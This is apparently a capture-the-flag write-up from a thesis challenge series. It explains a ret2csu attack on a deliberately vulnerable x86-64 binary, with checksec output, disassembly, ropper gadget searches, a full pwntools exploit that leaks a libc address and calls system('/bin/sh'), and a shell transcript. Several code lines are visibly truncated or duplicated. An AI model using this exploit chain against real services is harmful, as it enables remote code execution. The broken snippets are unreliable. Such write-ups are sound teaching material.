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  • Simple ret2csu example. Overflow the buffer and SFP, overwrite the return address to leak a libc address. This time, only read and write are available and there is no pop rdx gadget. Use __libc_csu_init to fill rdx with 8 bytes and set all registers to leak a libc address and then perform ret2libc attack.


  • ret2csu.


  • FLAG{wh4t_15_r3t2Csu?!}


First of all, we start with a checksec:

gef➤  checksec
[+] checksec for '/home/w3th4nds/github/Thesis/challenge7/challenge/challenge7'
Canary                        : ✘ 
NX                            : ✓ 
PIE                           : ✘ 
Fortify                       : ✘ 
RelRO                         : Full

Protections 🛡️

As we can see:

Protection Enabled Usage
Canary Prevents Buffer Overflows
NX Allows code execution on stack
PIE Randomizes the base address of the binary
RelRO Full Makes some binary sections read-only
  • Canary is disabled, meaning we can have a possible Buffer Overflow.
  • PIE is also disabled, meaning we know the base address of the binary and its functions and gadgets.

The interface of the program looks like this:

As we noticed before, there is indeed a Buffer Overflow, because after we entered a big amount of "A"s, the program stopped with Segmentation fault. This means we messed up with the addresses of the binary.

Disassembly ⛏️

Starting from main():

undefined8 main(void)

  write(1,"\n[-] You failed!\n",0x11);
  return 0;

There are some function calls:

  • setup() : Sets the appropriate buffers in order for the challenge to run.

Taking a better look at vulnerable_function():

void vulnerable_function(void)

  undefined local_48 [64];
  write(1,"\nStack frame:\n\n",0x10);
  write(1,"|             |\n",0x11);
  write(1,"| Return addr |\n",0x11);
  write(1,"|             |\n",0x11);
  write(1,"|     SFP     |\n",0x11);
  write(1,"|             |\n",0x11);
  write(1,"|  Buffer[63] |\n",0x11);
  write(1,"|      .      |\n",0x11);
  write(1,"|      .      |\n",0x11);
  write(1,"|             |\n",0x11);
  write(1,"|  Buffer[0]  |\n",0x11);
  write(1,"\n[*] Find gadgets in ",0x16);
  write(1,"[*] Use the \'pop\' ",0x13);
  write(1,"gadgets to fill ",0x11);
  write(1,"registers r13-r15 ",0x13);
  write(1,"and manipulate ",0x10);
  write(1,"rdi, rsi, rdx ",0xf);
  write(1,"to call ",9);
  write(1,"write(1, write@got, 8)",0x17);
  write(1," to leak libc addr.",0x14);
  write(1,"\n[*] ret2libc\n\n> ",0x11);

There are only read and write commands here. There is also an obvious Buffer Overflow with read(0, local_48, 0x100) and local_48 being only 64 bytes long.

Well, as long as we have a Buffer Overflow and canary and PIE are disabled, we can perform a ret2libc attack, right?

gef➤  p puts
No symbol table is loaded.  Use the "file" command.
gef➤  p write
$1 = {<text variable, no debug info>} 0x400510 <write@plt>
gef➤  p read
$2 = {<text variable, no debug info>} 0x400530 <read@plt>
gef➤  p printf
No symbol table is loaded.  Use the "file" command.

There is no puts or printf function to print something on the stdout. Only write can print to stdout.

From the man 2 page of write:

#include <unistd.h>

ssize_t write(int fd, const void *buf, size_t count);

write() writes up to count bytes from the buffer starting at buf to the file referred to by the file descriptor fd.

As we can see, write takes 3 arguments:

  • The file descriptor
  • The buffer or the text to write
  • Number of bytes to write

That means, we need 3 gadgets:

  • pop rdi; ret -> 1st argument
  • pop rsi; ret -> 2nd argument
  • pop rdx; ret -> 3rd argument

With Ropper we can find the gadgets:

challenge git:(main) ✗ ropper --file ./challenge7 --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: ./challenge7
0x00000000004009b3: pop rdi; ret; challenge git:(main) ✗ ropper --file ./challenge7 --search "pop rsi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rsi

[INFO] File: ./challenge7
0x00000000004009b1: pop rsi; pop r15; ret; challenge git:(main) ✗ ropper --file ./challenge7 --search "pop rdx"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx

There is no pop rdx gadget. That means, we cannot set the proper arguments for write. There is a place where we can find a gadget related to this.

__libc_csu_init ⭐

We can learn some things about this function here. It is something that is called by default at the beginning of the program. Taking a look at the instructions:

gef➤  disass __libc_csu_init 
Dump of assembler code for function __libc_csu_init:
   0x0000000000400950 <+0>:	push   r15
   0x0000000000400952 <+2>:	push   r14
   0x0000000000400954 <+4>:	mov    r15,rdx
   0x0000000000400957 <+7>:	push   r13
   0x0000000000400959 <+9>:	push   r12
   0x000000000040095b <+11>:	lea    r12,[rip+0x200456]        # 0x600db8
   0x0000000000400962 <+18>:	push   rbp
   0x0000000000400963 <+19>:	lea    rbp,[rip+0x200456]        # 0x600dc0
   0x000000000040096a <+26>:	push   rbx
   0x000000000040096b <+27>:	mov    r13d,edi
   0x000000000040096e <+30>:	mov    r14,rsi
   0x0000000000400971 <+33>:	sub    rbp,r12
   0x0000000000400974 <+36>:	sub    rsp,0x8
   0x0000000000400978 <+40>:	sar    rbp,0x3
   0x000000000040097c <+44>:	call   0x4004e8 <_init>
   0x0000000000400981 <+49>:	test   rbp,rbp
   0x0000000000400984 <+52>:	je     0x4009a6 <__libc_csu_init+86>
   0x0000000000400986 <+54>:	xor    ebx,ebx
   0x0000000000400988 <+56>:	nop    DWORD PTR [rax+rax*1+0x0]
   0x0000000000400990 <+64>:	mov    rdx,r15
   0x0000000000400993 <+67>:	mov    rsi,r14
   0x0000000000400996 <+70>:	mov    edi,r13d
   0x0000000000400999 <+73>:	call   QWORD PTR [r12+rbx*8]
   0x000000000040099d <+77>:	add    rbx,0x1
   0x00000000004009a1 <+81>:	cmp    rbp,rbx
   0x00000000004009a4 <+84>:	jne    0x400990 <__libc_csu_init+64>
   0x00000000004009a6 <+86>:	add    rsp,0x8
   0x00000000004009aa <+90>:	pop    rbx
   0x00000000004009ab <+91>:	pop    rbp
   0x00000000004009ac <+92>:	pop    r12
   0x00000000004009ae <+94>:	pop    r13
   0x00000000004009b0 <+96>:	pop    r14
   0x00000000004009b2 <+98>:	pop    r15
   0x00000000004009b4 <+100>:	ret    
End of assembler dump.

We see that rdx is affected here: 0x0000000000400990 <+64>: mov rdx,r15 The value of r15 is moved to rdx and we have another gadget available that pops r15 at: 0x00000000004009b2 <+98>: pop r15.

It is obvious that whatever we put in pop r15 will be moved to rdx.
Apart from that we can see that we can also manipulate rdi and rsi via r13 and r14 respectively.
Last but not least, we can call whatever there is in r12 (if we zero out the rbx).

Our goal is to call: write(1, write@got, 0x8) in order to leak write@got.
That means we need to:

  • pop r12 = write@got
  • pop r13 = 1
  • pop r14 = write@got
  • pop r15 = 0x8

So, we are going to use these 2 gadgets:

Gadget 1:
  0x00000000004009aa <+90>:  pop    rbx
  0x00000000004009ab <+91>:  pop    rbp
  0x00000000004009ac <+92>:  pop    r12
  0x00000000004009ae <+94>:  pop    r13
  0x00000000004009b0 <+96>:  pop    r14
  0x00000000004009b2 <+98>:  pop    r15
  0x00000000004009b4 <+100>: ret

Gadget 2:
  0x0000000000400990 <+64>:  mov    rdx,r15
  0x0000000000400993 <+67>:  mov    rsi,r14
  0x0000000000400996 <+70>:  mov    edi,r13d
  0x0000000000400999 <+73>:  call   QWORD PTR [r12+rbx*8]

Our payload for the leak looks like this:

def gadgets(payload, g1, g2):
  payload += p64(g1)          # g1
  payload += p64(0)           # pop rbx
  payload += p64(1)           # pop rbp
  payload += p64( # pop r12 -> call
  payload += p64(1)           # pop r13 -> rdi
  payload += p64( # pop r14 -> rsi
  payload += p64(0x8)         # pop r15 -> rdx
  payload += p64(g2)          # ret
  payload += p64(0)*7         # pops
  payload += p64(e.sym.vulnerable_function)  # return to vulnerable function
  return payload

We also need to 0 rbx, so that it calls [r12] only and insert 1 to rbp to pass the comparison here:

0x0000000000400999 <+73>:	call   QWORD PTR [r12+rbx*8]
0x000000000040099d <+77>:	add    rbx,0x1
0x00000000004009a1 <+81>:	cmp    rbp,rbx

After we get the leak with the usual way, we perform a retlibc attack, shown at challenge6, to get shell.

Exploit 📜

import warnings
from pwn import *
from termcolor import colored
context.arch = "amd64"

fname = "./challenge7" 

e     = ELF(fname)
rop   = ROP(e)
libc  = ELF("./") 

LOCAL = False

prompt = ">"

def find_boffset(max_num):
  # Avoid spamming
  context.log_level = "error"
  print(colored("\n[*] Searching for Overflow Offset..", "blue"))
  for i in range(1, max_num): 
    # Open connection
    r = process(fname)
    r.sendlineafter(prompt, "A"*i)
    # Recv everything
    # If the exit code == -1 (SegFault)
    if r.poll() == -11:
      if i%8==0:
        print(colored("\n[+] Buffer Overflow Offset found at: {}".format(i), "green"))
        return i
  print(colored("\n[-] Could not find Overflow Offset!\n", "red"))


Gadget 1:
  0x00000000004009aa <+90>:  pop    rbx
  0x00000000004009ab <+91>:  pop    rbp
  0x00000000004009ac <+92>:  pop    r12
  0x00000000004009ae <+94>:  pop    r13
  0x00000000004009b0 <+96>:  pop    r14
  0x00000000004009b2 <+98>:  pop    r15
  0x00000000004009b4 <+100>: ret

Gadget 2:
  0x0000000000400990 <+64>:  mov    rdx,r15
  0x0000000000400993 <+67>:  mov    rsi,r14
  0x0000000000400996 <+70>:  mov    edi,r13d
  0x0000000000400999 <+73>:  call   QWORD PTR [r12+rbx*8]


def gadgets(payload, g1, g2):
  payload += p64(g1)          # g1
  payload += p64(0)           # pop rbx
  payload += p64(1)           # pop rbp
  payload += p64( # pop r12 -> call
  payload += p64(1)           # pop r13 -> rdi
  payload += p64( # pop r14 -> rsi
  payload += p64(0x8)         # pop r15 -> rdx
  payload += p64(g2)          # ret
  payload += p64(0)*7         # pops
  payload += p64(e.sym.vulnerable_function)  # return to vulnerable function
  return payload

def ret2libc(r, prompt, offset):
  # Leak write@got address
  leak = r.recvline_contains(b"\x7f").strip()
  leak = u64(leak.ljust(8, b"\x00"))
  print(colored("[+] Leaked address    @ 0x{:x}".format(leak), "green"))
  libc.address = leak - libc.sym.write
  print(colored("[+] Libc base address @ 0x{:x}".format(libc.address), "green"))
  # Check if libc base is correct, should end with 000
  if libc.address & 0xfff != 000:
   print(colored("[-] Libc base does not end with 000!", "red"))

  # Craft paylaod to call system("/bin/sh") and spawn shell
  pop_rdi  = rop.find_gadget(["pop rdi"])[0]
  payload  = b"A"*offset
  payload += p64(pop_rdi)
  payload += p64(next("/bin/sh")))
  payload += p64(pop_rdi + 1) # stack alignment
  payload += p64(libc.sym.system)
  r.sendlineafter(prompt, payload)

def pwn():
  # Find the overflow offset
  offset = find_boffset(200)
  # Open a local process or a remote instance
  if LOCAL:
    r   = process(fname)
    r   = remote("", 1337)

  g1 = e.sym.__libc_csu_init + 90
  g2 = e.sym.__libc_csu_init + 64

  # Leak with ret2csu
  r.sendlineafter(">", gadgets(b"A"*offset, g1, g2))
  ret2libc(r, prompt, offset)

if __name__ == "__main__":

PoC 🏁

challenge git:(main) ✗ python
[*] '/home/w3th4nds/github/Thesis/challenge7/challenge/challenge7'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] Loaded 14 cached gadgets for './challenge7'
[*] '/home/w3th4nds/github/Thesis/challenge7/challenge/'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

[*] Searching for Overflow Offset..

[+] Buffer Overflow Offset found at: 72
[+] Leaked address    @ 0x7f5db577e210
[+] Libc base address @ 0x7f5db566e000
 $ id
uid=999(ctf) gid=999(ctf) groups=999(ctf)
$ cat flag.txt